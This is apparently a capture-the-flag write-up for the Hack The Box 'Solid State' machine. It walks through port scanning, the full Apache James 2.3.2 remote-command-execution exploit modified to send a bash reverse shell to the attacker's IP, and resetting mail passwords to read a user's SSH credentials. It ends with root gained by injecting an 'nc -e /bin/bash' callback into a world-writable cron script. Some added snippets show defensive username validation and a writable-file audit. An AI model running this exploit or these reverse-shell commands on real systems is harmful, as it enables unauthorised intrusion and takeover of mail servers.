Machine IP - 10.10.10.51
Starting with a quick nmap scan (-F, top 100 ports), the immediate result is as follows -
root@kali:~/Desktop/Hack The Box/solid state# nmap -F 10.10.10.51
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-11 18:36 +04
Nmap scan report for 10.10.10.51
Host is up (0.23s latency).
Not shown: 95 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
119/tcp open nntp
Nmap done: 1 IP address (1 host up) scanned in 2.37 seconds
The full port scan with version and script detection reveals this -
root@kali:~/Desktop/Hack The Box/solid state# nmap -sC -sV -p- -T5 10.10.10.51
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-11 18:36 +04
Warning: 10.10.10.51 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.51
Host is up (0.23s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.68 [10.10.14.68]),
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
4555/tcp open james-admin JAMES Remote Admin 2.3.2
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 545.12 seconds
The full port scan reveals that the server mainly runs Apache James, a Java mail server, with its SMTP, POP3 and NNTP services and, on port 4555, its remote administration tool. Searching searchsploit for the James version detected by nmap, we see an RCE -
root@kali:~/Desktop/Hack The Box/solid state# searchsploit james
------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------- ----------------------------------------
Apache James Server 2.2 - SMTP Denial of Service | exploits/multiple/dos/27915.pl
Apache James Server 2.3.2 - Remote Command Execution | exploits/linux/remote/35513.py
WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow | exploits/windows/remote/944.c
------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Thus, we use the RCE exploit (35513.py). It abuses the adduser command of the James administration tool, which does not sanitize the username: James creates a directory for every user to store their mail in, so a username containing path traversal, such as ../../../../../../../../etc/bash_completion.d, makes James store that user's mail in /etc/bash_completion.d, a directory whose files bash sources automatically whenever a user logs in. The exploit logs into the administration port with the default credentials to create this user, then sends it a mail whose body is the payload; the payload runs the next time any user logs in. The code, modified to give a reverse shell, is as follows -
import socket
import sys
import time

# Reverse shell back to the attacking machine (10.10.14.68, port 10023)
payload = 'bash -i >& /dev/tcp/10.10.14.68/10023 0>&1'
# Default credentials of the James Remote Administration Tool
user = 'root'
pwd = 'root'

if len(sys.argv) != 2:
    sys.stderr.write("[-]Usage: python %s <ip>\n" % sys.argv[0])
    sys.stderr.write("[-]Example: python %s 127.0.0.1\n" % sys.argv[0])
    sys.exit(1)

ip = sys.argv[1]


def recv(s):
    # Read the server reply and give it a moment before the next command
    s.recv(1024)
    time.sleep(0.2)


try:
    print "[+]Connecting to James Remote Administration Tool..."
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, 4555))
    s.recv(1024)
    s.send(user + "\n")
    s.recv(1024)
    s.send(pwd + "\n")
    s.recv(1024)
    print "[+]Creating user..."
    # The unsanitized username makes James use /etc/bash_completion.d as this user's mail directory
    s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
    s.recv(1024)
    s.send("quit\n")
    s.close()

    print "[+]Connecting to James SMTP server..."
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, 25))
    s.send("ehlo team@team.pl\r\n")
    recv(s)
    print "[+]Sending payload..."
    # The single quote in the sender address, closed by the lone quote below, turns the
    # mail headers into one quoted word so bash skips over them when sourcing the file
    s.send("mail from: <'@team.pl>\r\n")
    recv(s)
    s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
    recv(s)
    s.send("data\r\n")
    recv(s)
    s.send("From: team@team.pl\r\n")
    s.send("\r\n")
    s.send("'\n")
    s.send(payload + "\n")
    s.send("\r\n.\r\n")
    recv(s)
    s.send("quit\r\n")
    recv(s)
    s.close()
    print "[+]Done! Payload will be executed once somebody logs in."
except:
    print "Connection failed."
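The root cause above is a username that reaches the filesystem unchecked. As an added illustration (not code from the exploit or from Apache James), the following contrasts a naive per-user directory lookup, which lets the traversal username resolve to /etc/bash_completion.d, with a hardened version that rejects it. MAIL_ROOT and the allowed username alphabet are assumptions chosen for the example.

```python
import posixpath
import re

# Assumed base directory under which a James-style server keeps per-user mail
MAIL_ROOT = "/var/mail/james/inboxes"
# Allow-list for usernames: a conservative local-part alphabet, no '/' and no leading '.'
USERNAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


def naive_user_dir(username):
    """Unsafe: joins the username onto MAIL_ROOT without validation, which is
    what the vulnerable adduser handling effectively does. A traversal
    username escapes MAIL_ROOT entirely."""
    return posixpath.normpath(posixpath.join(MAIL_ROOT, username))


def safe_user_dir(username):
    """Hardened: validate against the allow-list, then additionally confirm the
    resolved directory is a direct child of MAIL_ROOT before returning it."""
    if not USERNAME_RE.match(username):
        raise ValueError(f"invalid username: {username!r}")
    candidate = posixpath.normpath(posixpath.join(MAIL_ROOT, username))
    if posixpath.dirname(candidate) != MAIL_ROOT:
        raise ValueError("username resolves outside the mail root")
    return candidate


def demo():
    """Run both versions against the traversal username used by the exploit."""
    traversal = "../../../../../../../../etc/bash_completion.d"
    results = {"naive": naive_user_dir(traversal)}
    try:
        results["safe"] = safe_user_dir(traversal)
    except ValueError as exc:
        results["safe"] = f"rejected ({exc})"
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```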
Now, we know that the exploit will only work if the James administration credentials are in fact the defaults, i.e. root:root. Therefore, we try them and find that the credentials are indeed the default ones.
root@kali:~/Desktop/Hack The Box/solid state# telnet 10.10.10.51 4555
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
HELP
Currently implemented commands:
help display this help
listusers display existing accounts
countusers display the number of existing accounts
adduser [username] [password] add a new user
verify [username] verify if specified user exist
deluser [username] delete existing user
setpassword [username] [password] sets a user's password
setalias [user] [alias] locally forwards all email for 'user' to 'alias'
showalias [username] shows a user's current email alias
unsetalias [user] unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username] shows a user's current email forwarding
unsetforwarding [username] removes a forward
user [repositoryname] change to another user repository
shutdown kills the current JVM (convenient when James is run as a daemon)
quit close connection
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
setpassword james tanq
Password for james reset
setpassword thomas tanq
Password for thomas reset
setpassword mindy tanq
Password for mindy reset
setpassword mailadmin tanq
Password for mailadmin reset
quit
Bye
Connection closed by foreign host.
Upon connecting, we saw what the administration tool lets us do and reset the mail passwords of the users. Now, we can log in to the POP3 server to read their emails, by talking to the server with telnet or nc and the POP3 commands. This is tried for all 4 users above, but only one user gave useful results -
root@kali:~/Desktop/Hack The Box/solid state# telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER mindy
+OK
PASS tanq
+OK Welcome mindy
LIST
+OK 2 1945
1 1109
2 836
.
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
for <mindy@localhost>;
Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome
Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.
We are looking forward to you joining our team and your success at Solid State Security.
Respectfully,
James
.
RETR 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <mindy@localhost>;
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
username: mindy
pass: P@55W0rd1!2@
Respectfully,
James
.
QUIT
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.
From here, we have the SSH password of the user mindy. Logging in with it, we get the following -
root@kali:~/Desktop/Hack The Box/solid state# ssh mindy@10.10.10.51
mindy@10.10.10.51's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
GIBBERISH
mindy@solidstate:~$ ls
bin user.txt
mindy@solidstate:~$ cat user.txt
914d0a4ebc177889b5b89a23f556fd75
We get the user flag from here. The shell isn't bash but rbash, restricted bash. It disallows commands containing '/', changing directories with cd, and the usual escapes via sudo, less, more, vi, nano, man, etc., so there is no direct way of obtaining a normal bash shell. The only way to run an unrestricted bash is a preloaded construct that executes when a user, in this case mindy, logs in, which is exactly what the bash_completion.d RCE gives us. Turning back to the RCE now, we log out, run the exploit, start a netcat listener and log in again, so that the payload fires and hands us a bash shell outside the jail -
root@kali:~/Desktop/Hack The Box/solid state# python james_exploit.py 10.10.10.51
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.
We start the nc listener and log in over SSH again; the SSH session does not return a prompt, but the nc listener now has a shell, which we can use for privilege escalation -
root@kali:~/Desktop/Hack The Box/solid state# nc -lvp 10023
listening on [any] 10023 ...
10.10.10.51: inverse host lookup failed: Unknown host
connect to [10.10.14.68] from (UNKNOWN) [10.10.10.51] 47318
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ whoami
whoami
mindy
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cd ..
cd ..
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ cd /
cd /
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ ls
ls
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ find /bin -writable -user root -type f 2>/dev/null
find /bin -writable -user root -type f 2>/dev/null
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ find /dev -writable -user root -type f 2>/dev/null
find /dev -writable -user root -type f 2>/dev/null
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ find /opt -writable -user root -type f 2>/dev/null
find /opt -writable -user root -type f 2>/dev/null
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ find /opt -writable -user root -type f 2>/dev/null
find /opt -writable -user root -type f 2>/dev/null
/opt/tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ cat /opt/tmp.py
cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
    os.system('rm -r /tmp/*')
except:
    sys.exit()
After going through the usual Linux privilege escalation checks, the only useful result comes from writable files. The find command above looks for files owned by root that our user is allowed to write to (in practice, world-writable files). One such file is in the opt directory, as listed above: tmp.py. It is owned by root and cleans /tmp, so it is likely run by root, probably from a cron job, and whatever we write into it would run with root privileges. We can try this by editing the script. First, we upgrade to a proper interactive shell with the following -
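As an added audit example (not the author's code), the check from the writeup can be expressed as a small script that lists root-owned regular files a given low-privilege account could modify, deciding from the mode bits rather than from the caller's own identity so an administrator can ask the question about any user. The default directories and the uid/gids arguments are assumptions for the example.

```python
import os
import stat


def writable_by(st, uid, gids):
    """Decide from the mode bits whether an account with (uid, gids) may write
    the file. Root is deliberately not special-cased: the question is what a
    low-privilege account such as mindy can change."""
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def writable_root_files(roots, uid, gids, owner_uid=0):
    """Walk the given directories and return the regular files owned by
    owner_uid (root by default) that the account (uid, gids) could modify.
    Symlinks are skipped because lstat is used and only S_ISREG entries count."""
    hits = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue  # unreadable or vanished entry, like find's 2>/dev/null
                if not stat.S_ISREG(st.st_mode):
                    continue
                if st.st_uid == owner_uid and writable_by(st, uid, gids):
                    hits.append(path)
    return sorted(hits)


if __name__ == "__main__":
    import sys
    # Audit the same places enumerated in the writeup, for the current account.
    targets = sys.argv[1:] or ["/bin", "/dev", "/opt", "/etc"]
    for hit in writable_root_files(targets, os.getuid(), set(os.getgroups())):
        print(hit)
```

Any root-owned script that shows up here and is referenced from a cron job or init script should be treated as a privilege escalation path and made writable by root only.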
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ python -c 'import pty; pty.spawn("/bin/bash");'
python -c 'import pty; pty.spawn("/bin/bash");'
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ ^Z
[1]+ Stopped nc -lvp 10023
root@kali:~/Desktop/Hack The Box/solid state# stty raw -echo
root@kali:~/Desktop/Hack The Box/solid state# nc -lvp 10023
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ export TERM=screen
Now, we edit the file so that the os.system call runs nc -e /bin/bash 10.10.14.68 9999 instead, which opens a shell back to us. The file is probably executed on a schedule, but we can't read root's crontab as an unprivileged user, so we change the code and watch whether a connection comes back. After waiting for a few minutes, we get the shell as follows -
root@kali:~/Desktop/Hack The Box/solid state# nc -lvp 9999
listening on [any] 9999 ...
10.10.10.51: inverse host lookup failed: Unknown host
connect to [10.10.14.68] from (UNKNOWN) [10.10.10.51] 43938
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls
root.txt
cat root.txt
b4c9723a28899b1c45db281d99cc87c9
Thus, we get the root flag as well.